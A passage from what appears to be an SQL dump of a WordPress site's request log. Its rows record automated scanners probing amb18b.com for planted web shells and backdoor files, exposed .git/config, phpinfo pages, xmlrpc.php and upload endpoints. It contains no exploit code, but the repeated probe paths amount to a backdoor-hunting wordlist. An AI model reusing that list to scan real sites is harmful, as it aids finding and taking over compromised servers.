20:38:49'),(845,'https://amb18b.com/wp-includes/system_log.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:51','2025-10-23 20:38:51'),(846,'https://amb18b.com/file.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:38:53','2025-10-23 20:38:53'),(847,'https://amb18b.com/as.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:55','2025-10-23 20:38:55'),(848,'https://amb18b.com/.well-known/acme-challenge/index.php','23.102.71.189','Direct Access',1,'2025-10-23 20:38:57','2025-10-23 20:38:57'),(849,'https://amb18b.com/manager.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:39:01','2025-10-23 20:39:01'),(850,'https://amb18b.com/plugins/pwnd/as.php','23.102.71.189','Direct Access',1,'2025-10-23 20:39:03','2025-10-23 20:39:03'),(851,'https://amb18b.com/wp-configs.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:39:05','2025-10-23 20:39:05'),(852,'https://amb18b.com/wp-includes/html-api/wp-conflg.php?p=','23.102.71.189','Direct Access',1,'2025-10-23 20:39:07','2025-10-23 20:39:07'),(853,'https://amb18b.com/wp-includes/js/crop/zmFM.php','23.102.71.189','Direct Access',1,'2025-10-23 20:39:09','2025-10-23 20:39:09'),(854,'https://amb18b.com/wp-includes/rest-api/fields/index.php?','23.102.71.189','Direct Access',1,'2025-10-23 20:39:11','2025-10-23 20:39:11'),(855,'https://amb18b.com/index/fucku.php','23.102.71.189','Direct Access',1,'2025-10-23 20:39:13','2025-10-23 20:39:13'),(856,'https://amb18b.com/upload/wp-info.php','23.102.71.189','Direct Access',1,'2025-10-23 20:39:14','2025-10-23 20:39:14'),(857,'https://amb18b.com/post.php','23.102.71.189','Direct Access',1,'2025-10-23 20:39:16','2025-10-23 20:39:16'),(858,'https://amb18b.com/.well-known/acme-challenge/admin.php','23.102.71.189','Direct Access',1,'2025-10-23 20:39:18','2025-10-23 20:39:18'),(859,'https://amb18b.com//wp-includes/wlwmanifest.xml','45.154.98.144','Direct Access',1,'2025-10-23 22:29:55','2025-10-23 22:29:55'),(860,'https://amb18b.com//?author=2','45.154.98.144','Direct Access',1,'2025-10-23 22:29:57','2025-10-23 22:29:57'),(861,'https://amb18b.com/i.php','81.200.8.138','Direct Access',1,'2025-10-23 23:38:43','2025-10-23 23:38:43'),(862,'https://amb18b.com/p.php','81.200.8.138','Direct Access',1,'2025-10-23 23:38:44','2025-10-23 23:38:44'),(863,'https://amb18b.com/info.php','81.200.8.138','Direct Access',1,'2025-10-23 23:38:44','2025-10-23 23:38:44'),(864,'https://amb18b.com/test.php','81.200.8.138','Direct Access',1,'2025-10-23 23:38:44','2025-10-23 23:38:44'),(865,'https://amb18b.com/phpinfo.php','81.200.8.138','Direct Access',1,'2025-10-23 23:38:44','2025-10-23 23:38:44'),(866,'https://amb18b.com/?p=1&replytocom=1','187.136.225.218','Direct Access',1,'2025-10-24 04:16:49','2025-10-24 04:16:49'),(867,'https://amb18b.com/app/','34.1.22.29','Direct Access',3,'2025-10-24 05:06:54','2025-10-24 05:06:44'),(868,'https://amb18b.com/login/','34.1.22.29','Direct Access',3,'2025-10-24 05:06:57','2025-10-24 05:06:45'),(869,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','130.33.52.240','Invalid Referrer',1,'2025-10-24 05:40:41','2025-10-24 05:40:41'),(870,'https://amb18b.com/wp-plain.php','130.33.52.240','Invalid Referrer',1,'2025-10-24 05:40:41','2025-10-24 05:40:41'),(871,'https://amb18b.com/','130.33.52.240','Invalid Referrer',2,'2025-10-24 05:40:46','2025-10-24 05:40:45'),(872,'https://amb18b.com/alfacgiapi/perl.alfa','130.33.52.240','Invalid Referrer',1,'2025-10-24 05:40:47','2025-10-24 05:40:47'),(873,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','130.33.52.240','Direct Access',1,'2025-10-24 05:40:49','2025-10-24 05:40:49'),(874,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','130.33.52.240','Direct Access',1,'2025-10-24 05:40:53','2025-10-24 05:40:53'),(875,'https://amb18b.com/manager/assets/modext/core/modx.js','188.130.248.55','Direct Access',1,'2025-10-24 10:17:51','2025-10-24 10:17:51'),(876,'https://amb18b.com/manager/media/script/mootools/mootools.js','91.222.218.53','Direct Access',1,'2025-10-24 10:19:50','2025-10-24 10:19:50'),(877,'https://amb18b.com/atomlib.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:21','2025-10-24 11:39:21'),(878,'https://amb18b.com/a.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:23','2025-10-24 11:39:23'),(879,'https://amb18b.com/v.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:25','2025-10-24 11:39:25'),(880,'https://amb18b.com/d2.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:26','2025-10-24 11:39:26'),(881,'https://amb18b.com/xc.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:29','2025-10-24 11:39:29'),(882,'https://amb18b.com/g.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:31','2025-10-24 11:39:31'),(883,'https://amb18b.com/gmo.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:32','2025-10-24 11:39:32'),(884,'https://amb18b.com/11.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:33','2025-10-24 11:39:33'),(885,'https://amb18b.com/20.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:35','2025-10-24 11:39:35'),(886,'https://amb18b.com/f35.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:37','2025-10-24 11:39:37'),(887,'https://amb18b.com/1.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:39','2025-10-24 11:39:39'),(888,'https://amb18b.com/c.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:41','2025-10-24 11:39:41'),(889,'https://amb18b.com/build.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:42','2025-10-24 11:39:42'),(890,'https://amb18b.com/bless.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:43','2025-10-24 11:39:43'),(891,'https://amb18b.com/admin/upload/css.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:45','2025-10-24 11:39:45'),(892,'https://amb18b.com/lock360.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:47','2025-10-24 11:39:47'),(893,'https://amb18b.com/4.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:39:49','2025-10-24 11:39:49'),(894,'https://amb18b.com/about.php','4.217.189.130','Direct Access',2,'2025-10-24 11:41:24','2025-10-24 11:39:51'),(895,'https://amb18b.com/r.php','4.217.189.130','Direct Access',2,'2025-10-24 11:40:29','2025-10-24 11:39:53'),(896,'https://amb18b.com/v4.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:54','2025-10-24 11:39:54'),(897,'https://amb18b.com/wp-22.php','4.217.189.130','Direct Access',1,'2025-10-24 11:39:56','2025-10-24 11:39:56'),(898,'https://amb18b.com/makeasmtp.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:39:58','2025-10-24 11:39:58'),(899,'https://amb18b.com/system_log.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:00','2025-10-24 11:40:00'),(900,'https://amb18b.com/NewFile.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:03','2025-10-24 11:40:03'),(901,'https://amb18b.com/t.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:40:05','2025-10-24 11:40:05'),(902,'https://amb18b.com/ee.php','4.217.189.130','Direct Access',2,'2025-10-24 11:40:32','2025-10-24 11:40:06'),(903,'https://amb18b.com/2.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:08','2025-10-24 11:40:08'),(904,'https://amb18b.com//gmo.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:10','2025-10-24 11:40:10'),(905,'https://amb18b.com/6.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:13','2025-10-24 11:40:13'),(906,'https://amb18b.com/12.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:14','2025-10-24 11:40:14'),(907,'https://amb18b.com/0.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:16','2025-10-24 11:40:16'),(908,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:40:18','2025-10-24 11:40:18'),(909,'https://amb18b.com/wp-includes/js/codemirror/index.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:19','2025-10-24 11:40:19'),(910,'https://amb18b.com/02.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:21','2025-10-24 11:40:21'),(911,'https://amb18b.com/w.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:23','2025-10-24 11:40:23'),(912,'https://amb18b.com/go.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:40:25','2025-10-24 11:40:25'),(913,'https://amb18b.com/public_html','4.217.189.130','Direct Access',1,'2025-10-24 11:40:27','2025-10-24 11:40:27'),(914,'https://amb18b.com/an.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:33','2025-10-24 11:40:33'),(915,'https://amb18b.com/wp.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:35','2025-10-24 11:40:35'),(916,'https://amb18b.com/admin.php','4.217.189.130','Direct Access',2,'2025-10-24 11:40:40','2025-10-24 11:40:39'),(917,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:42','2025-10-24 11:40:42'),(918,'https://amb18b.com/index/function.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:44','2025-10-24 11:40:44'),(919,'https://amb18b.com/wp-includes/ID3/rk2.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:46','2025-10-24 11:40:46'),(920,'https://amb18b.com/license.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:47','2025-10-24 11:40:47'),(921,'https://amb18b.com/radio.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:50','2025-10-24 11:40:50'),(922,'https://amb18b.com/info.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:52','2025-10-24 11:40:52'),(923,'https://amb18b.com/alfanew.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:54','2025-10-24 11:40:54'),(924,'https://amb18b.com/inputs.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:55','2025-10-24 11:40:55'),(925,'https://amb18b.com/admin/function.php','4.217.189.130','Direct Access',1,'2025-10-24 11:40:59','2025-10-24 11:40:59'),(926,'https://amb18b.com/wp-includes/assets/index.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:01','2025-10-24 11:41:01'),(927,'https://amb18b.com/wp-admin/images/index.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:03','2025-10-24 11:41:03'),(928,'https://amb18b.com/default.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:04','2025-10-24 11:41:04'),(929,'https://amb18b.com/lv.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:06','2025-10-24 11:41:06'),(930,'https://amb18b.com/marijuana.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:11','2025-10-24 11:41:11'),(931,'https://amb18b.com/wp-includes/autoload_classmap.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:13','2025-10-24 11:41:13'),(932,'https://amb18b.com/css/colors/coffee/index.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:17','2025-10-24 11:41:17'),(933,'https://amb18b.com/css.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:20','2025-10-24 11:41:20'),(934,'https://amb18b.com/1.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:41:25','2025-10-24 11:41:25'),(935,'https://amb18b.com/marijuana.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:41:27','2025-10-24 11:41:27'),(936,'https://amb18b.com/about/function.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:41:29','2025-10-24 11:41:29'),(937,'https://amb18b.com/simple.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:31','2025-10-24 11:41:31'),(938,'https://amb18b.com/goat1.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:32','2025-10-24 11:41:32'),(939,'https://amb18b.com/chosen.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:41:34','2025-10-24 11:41:34'),(940,'https://amb18b.com/yanz.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:36','2025-10-24 11:41:36'),(941,'https://amb18b.com/config.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:41:38','2025-10-24 11:41:38'),(942,'https://amb18b.com/network.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:40','2025-10-24 11:41:40'),(943,'https://amb18b.com/wp-2019.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:41:43','2025-10-24 11:41:43'),(944,'https://amb18b.com/bypass.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:47','2025-10-24 11:41:47'),(945,'https://amb18b.com/wp-includes/IXR/admin.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:50','2025-10-24 11:41:50'),(946,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','4.217.189.130','Direct Access',1,'2025-10-24 11:41:53','2025-10-24 11:41:53'),(947,'https://amb18b.com/tiny.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:41:56','2025-10-24 11:41:56'),(948,'https://amb18b.com/lock.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:00','2025-10-24 11:42:00'),(949,'https://amb18b.com/mail.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:42:03','2025-10-24 11:42:03'),(950,'https://amb18b.com/wp-includes/system_log.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:42:07','2025-10-24 11:42:08'),(951,'https://amb18b.com/file.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:42:12','2025-10-24 11:42:12'),(952,'https://amb18b.com/as.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:17','2025-10-24 11:42:17'),(953,'https://amb18b.com/.well-known/acme-challenge/index.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:20','2025-10-24 11:42:20'),(954,'https://amb18b.com/manager.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:42:24','2025-10-24 11:42:24'),(955,'https://amb18b.com/plugins/pwnd/as.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:26','2025-10-24 11:42:26'),(956,'https://amb18b.com/wp-configs.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:42:29','2025-10-24 11:42:29'),(957,'https://amb18b.com/wp-includes/html-api/wp-conflg.php?p=','4.217.189.130','Direct Access',1,'2025-10-24 11:42:31','2025-10-24 11:42:31'),(958,'https://amb18b.com/wp-includes/js/crop/zmFM.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:34','2025-10-24 11:42:34'),(959,'https://amb18b.com/wp-includes/rest-api/fields/index.php?','4.217.189.130','Direct Access',1,'2025-10-24 11:42:37','2025-10-24 11:42:37'),(960,'https://amb18b.com/index/fucku.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:39','2025-10-24 11:42:39'),(961,'https://amb18b.com/upload/wp-info.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:41','2025-10-24 11:42:41'),(962,'https://amb18b.com/post.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:42','2025-10-24 11:42:42'),(963,'https://amb18b.com/.well-known/acme-challenge/admin.php','4.217.189.130','Direct Access',1,'2025-10-24 11:42:44','2025-10-24 11:42:44'),(964,'https://amb18b.com/.git/config','2a02:4780:12:817d::1','Direct Access',1,'2025-10-24 11:59:59','2025-10-24 11:59:59'),(965,'https://amb18b.com/.git/config','2a02:4780:12:817d::1','Direct Access',1,'2025-10-24 12:00:00','2025-10-24 12:00:00'),(966,'https://amb18b.com/xmlrpc.php','104.219.251.246','https://amb18b.com',1,'2025-10-24 12:36:42','2025-10-24 12:36:42'),(967,'https://amb18b.com/xmlrpc.php','139.59.11.189','https://amb18b.com',1,'2025-10-24 12:52:35','2025-10-24 12:52:35'),(968,'https://amb18b.com/atomlib.php','20.222.239.116','Direct Access',1,'2025-10-24 13:00:56','2025-10-24 13:00:56'),(969,'https://amb18b.com/a.php','20.222.239.116','Direct Access',1,'2025-10-24 13:00:57','2025-10-24 13:00:57'),(970,'https://amb18b.com/v.php','20.222.239.116','Direct Access',1,'2025-10-24 13:00:59','2025-10-24 13:00:59'),(971,'https://amb18b.com/d2.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:00','2025-10-24 13:01:00'),(972,'https://amb18b.com/xc.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:01','2025-10-24 13:01:01'),(973,'https://amb18b.com/g.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:02','2025-10-24 13:01:02'),(974,'https://amb18b.com/gmo.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:03','2025-10-24 13:01:03'),(975,'https://amb18b.com/11.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:04','2025-10-24 13:01:04'),(976,'https://amb18b.com/20.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:05','2025-10-24 13:01:05'),(977,'https://amb18b.com/f35.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:07','2025-10-24 13:01:07'),(978,'https://amb18b.com/1.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:08','2025-10-24 13:01:08'),(979,'https://amb18b.com/c.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:09','2025-10-24 13:01:09'),(980,'https://amb18b.com/build.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:11','2025-10-24 13:01:11'),(981,'https://amb18b.com/bless.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:12','2025-10-24 13:01:12'),(982,'https://amb18b.com/admin/upload/css.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:13','2025-10-24 13:01:13'),(983,'https://amb18b.com/lock360.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:15','2025-10-24 13:01:15'),(984,'https://amb18b.com/4.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:01:16','2025-10-24 13:01:16'),(985,'https://amb18b.com/about.php','20.222.239.116','Direct Access',2,'2025-10-24 13:02:32','2025-10-24 13:01:17'),(986,'https://amb18b.com/r.php','20.222.239.116','Direct Access',2,'2025-10-24 13:01:45','2025-10-24 13:01:19'),(987,'https://amb18b.com/v4.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:20','2025-10-24 13:01:20'),(988,'https://amb18b.com/wp-22.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:22','2025-10-24 13:01:22'),(989,'https://amb18b.com/makeasmtp.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:01:23','2025-10-24 13:01:23'),(990,'https://amb18b.com/system_log.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:24','2025-10-24 13:01:24'),(991,'https://amb18b.com/NewFile.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:26','2025-10-24 13:01:26'),(992,'https://amb18b.com/t.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:01:27','2025-10-24 13:01:27'),(993,'https://amb18b.com/ee.php','20.222.239.116','Direct Access',2,'2025-10-24 13:01:46','2025-10-24 13:01:28'),(994,'https://amb18b.com/2.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:30','2025-10-24 13:01:30'),(995,'https://amb18b.com//gmo.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:31','2025-10-24 13:01:31'),(996,'https://amb18b.com/6.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:32','2025-10-24 13:01:32'),(997,'https://amb18b.com/12.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:33','2025-10-24 13:01:33'),(998,'https://amb18b.com/0.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:35','2025-10-24 13:01:35'),(999,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:01:37','2025-10-24 13:01:37'),(1000,'https://amb18b.com/wp-includes/js/codemirror/index.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:38','2025-10-24 13:01:38'),(1001,'https://amb18b.com/02.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:39','2025-10-24 13:01:39'),(1002,'https://amb18b.com/w.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:41','2025-10-24 13:01:41'),(1003,'https://amb18b.com/go.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:01:42','2025-10-24 13:01:42'),(1004,'https://amb18b.com/public_html','20.222.239.116','Direct Access',1,'2025-10-24 13:01:43','2025-10-24 13:01:43'),(1005,'https://amb18b.com/an.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:47','2025-10-24 13:01:47'),(1006,'https://amb18b.com/wp.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:48','2025-10-24 13:01:48'),(1007,'https://amb18b.com/admin.php','20.222.239.116','Direct Access',2,'2025-10-24 13:01:52','2025-10-24 13:01:51'),(1008,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:53','2025-10-24 13:01:53'),(1009,'https://amb18b.com/index/function.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:55','2025-10-24 13:01:55'),(1010,'https://amb18b.com/wp-includes/ID3/rk2.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:56','2025-10-24 13:01:56'),(1011,'https://amb18b.com/license.php','20.222.239.116','Direct Access',1,'2025-10-24 13:01:58','2025-10-24 13:01:58'),(1012,'https://amb18b.com/radio.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:01','2025-10-24 13:02:01'),(1013,'https://amb18b.com/info.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:03','2025-10-24 13:02:03'),(1014,'https://amb18b.com/alfanew.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:04','2025-10-24 13:02:04'),(1015,'https://amb18b.com/inputs.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:06','2025-10-24 13:02:06'),(1016,'https://amb18b.com/admin/function.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:09','2025-10-24 13:02:09'),(1017,'https://amb18b.com/wp-includes/assets/index.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:10','2025-10-24 13:02:10'),(1018,'https://amb18b.com/wp-admin/images/index.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:11','2025-10-24 13:02:11'),(1019,'https://amb18b.com/default.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:13','2025-10-24 13:02:13'),(1020,'https://amb18b.com/lv.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:14','2025-10-24 13:02:14'),(1021,'https://amb18b.com/marijuana.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:20','2025-10-24 13:02:20'),(1022,'https://amb18b.com/wp-includes/autoload_classmap.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:23','2025-10-24 13:02:23'),(1023,'https://amb18b.com/css/colors/coffee/index.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:28','2025-10-24 13:02:28'),(1024,'https://amb18b.com/css.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:29','2025-10-24 13:02:29'),(1025,'https://amb18b.com/1.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:33','2025-10-24 13:02:33'),(1026,'https://amb18b.com/marijuana.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:34','2025-10-24 13:02:34'),(1027,'https://amb18b.com/about/function.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:36','2025-10-24 13:02:36'),(1028,'https://amb18b.com/simple.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:37','2025-10-24 13:02:37'),(1029,'https://amb18b.com/goat1.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:38','2025-10-24 13:02:38'),(1030,'https://amb18b.com/chosen.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:40','2025-10-24 13:02:40'),(1031,'https://amb18b.com/yanz.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:41','2025-10-24 13:02:41'),(1032,'https://amb18b.com/config.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:43','2025-10-24 13:02:43'),(1033,'https://amb18b.com/network.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:44','2025-10-24 13:02:44'),(1034,'https://amb18b.com/wp-2019.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:45','2025-10-24 13:02:45'),(1035,'https://amb18b.com/bypass.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:47','2025-10-24 13:02:47'),(1036,'https://amb18b.com/wp-includes/IXR/admin.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:48','2025-10-24 13:02:48'),(1037,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:49','2025-10-24 13:02:49'),(1038,'https://amb18b.com/tiny.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:02:51','2025-10-24 13:02:51'),(1039,'https://amb18b.com/lock.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:52','2025-10-24 13:02:52'),(1040,'https://amb18b.com/mail.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:54','2025-10-24 13:02:54'),(1041,'https://amb18b.com/wp-includes/system_log.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:55','2025-10-24 13:02:55'),(1042,'https://amb18b.com/file.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:02:57','2025-10-24 13:02:57'),(1043,'https://amb18b.com/as.php','20.222.239.116','Direct Access',1,'2025-10-24 13:02:59','2025-10-24 13:02:59'),(1044,'https://amb18b.com/.well-known/acme-challenge/index.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:00','2025-10-24 13:03:00'),(1045,'https://amb18b.com/manager.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:03:04','2025-10-24 13:03:04'),(1046,'https://amb18b.com/plugins/pwnd/as.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:06','2025-10-24 13:03:06'),(1047,'https://amb18b.com/wp-configs.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:03:07','2025-10-24 13:03:07'),(1048,'https://amb18b.com/wp-includes/html-api/wp-conflg.php?p=','20.222.239.116','Direct Access',1,'2025-10-24 13:03:08','2025-10-24 13:03:08'),(1049,'https://amb18b.com/wp-includes/js/crop/zmFM.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:09','2025-10-24 13:03:09'),(1050,'https://amb18b.com/wp-includes/rest-api/fields/index.php?','20.222.239.116','Direct Access',1,'2025-10-24 13:03:11','2025-10-24 13:03:11'),(1051,'https://amb18b.com/index/fucku.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:13','2025-10-24 13:03:13'),(1052,'https://amb18b.com/upload/wp-info.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:14','2025-10-24 13:03:14'),(1053,'https://amb18b.com/post.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:15','2025-10-24 13:03:15'),(1054,'https://amb18b.com/.well-known/acme-challenge/admin.php','20.222.239.116','Direct Access',1,'2025-10-24 13:03:17','2025-10-24 13:03:17'),(1055,'https://amb18b.com/wp-cli.php','37.78.182.185','Direct Access',1,'2025-10-24 14:05:46','2025-10-24 14:05:46'),(1056,'https://amb18b.com/wp-cli.phar','37.78.182.185','Direct Access',1,'2025-10-24 14:05:46','2025-10-24 14:05:46'),(1057,'https://amb18b.com/assets/jqueryfileupload/server/php/index.php?file=tf2rghf.jpg','196.251.86.13','Direct Access',1,'2025-10-24 14:13:29','2025-10-24 14:13:29'),(1058,'https://amb18b.com/rest','212.59.106.53','Direct Access',1,'2025-10-24 16:40:13','2025-10-24 16:40:13'),(1059,'https://amb18b.com/?p=1','17.246.23.18','Direct Access',1,'2025-10-24 18:27:40','2025-10-24 18:27:40'),(1060,'https://amb18b.com/app/','34.1.22.53','Direct Access',4,'2025-10-24 18:28:28','2025-10-24 18:28:16'),(1061,'https://amb18b.com/login/','34.1.22.53','Direct Access',4,'2025-10-24 18:28:32','2025-10-24 18:28:19'),(1062,'https://amb18b.com/api/index.php/v1/config/application?public=true','51.68.46.249','Direct Access',1,'2025-10-24 19:09:35','2025-10-24 19:09:35'),(1063,'https://amb18b.com/app/','34.1.21.248','Direct Access',3,'2025-10-24 19:40:45','2025-10-24 19:40:23'),(1064,'https://amb18b.com/login/','34.1.21.248','Direct Access',3,'2025-10-24 19:40:48','2025-10-24 19:40:27'),(1065,'https://amb18b.com/app/','34.1.21.6','Direct Access',3,'2025-10-24 20:54:37','2025-10-24 20:53:55'),(1066,'https://amb18b.com/login/','34.1.21.6','Direct Access',3,'2025-10-24 20:54:43','2025-10-24 20:54:01'),(1067,'https://amb18b.com/.git/config','93.123.109.7','Direct Access',1,'2025-10-24 20:57:46','2025-10-24 20:57:46'),(1068,'https://amb18b.com//wp-includes/wlwmanifest.xml','18.192.126.68','Direct Access',1,'2025-10-24 21:26:08','2025-10-24 21:26:08'),(1069,'https://amb18b.com//?author=2','18.192.126.68','Direct Access',1,'2025-10-24 21:26:11','2025-10-24 21:26:11'),(1070,'https://amb18b.com//?author=3','18.192.126.68','Direct Access',1,'2025-10-24 21:26:13','2025-10-24 21:26:13'),(1071,'https://amb18b.com/app/','34.1.29.232','Direct Access',3,'2025-10-24 21:37:03','2025-10-24 21:36:34'),(1072,'https://amb18b.com/login/','34.1.29.232','Direct Access',3,'2025-10-24 21:37:06','2025-10-24 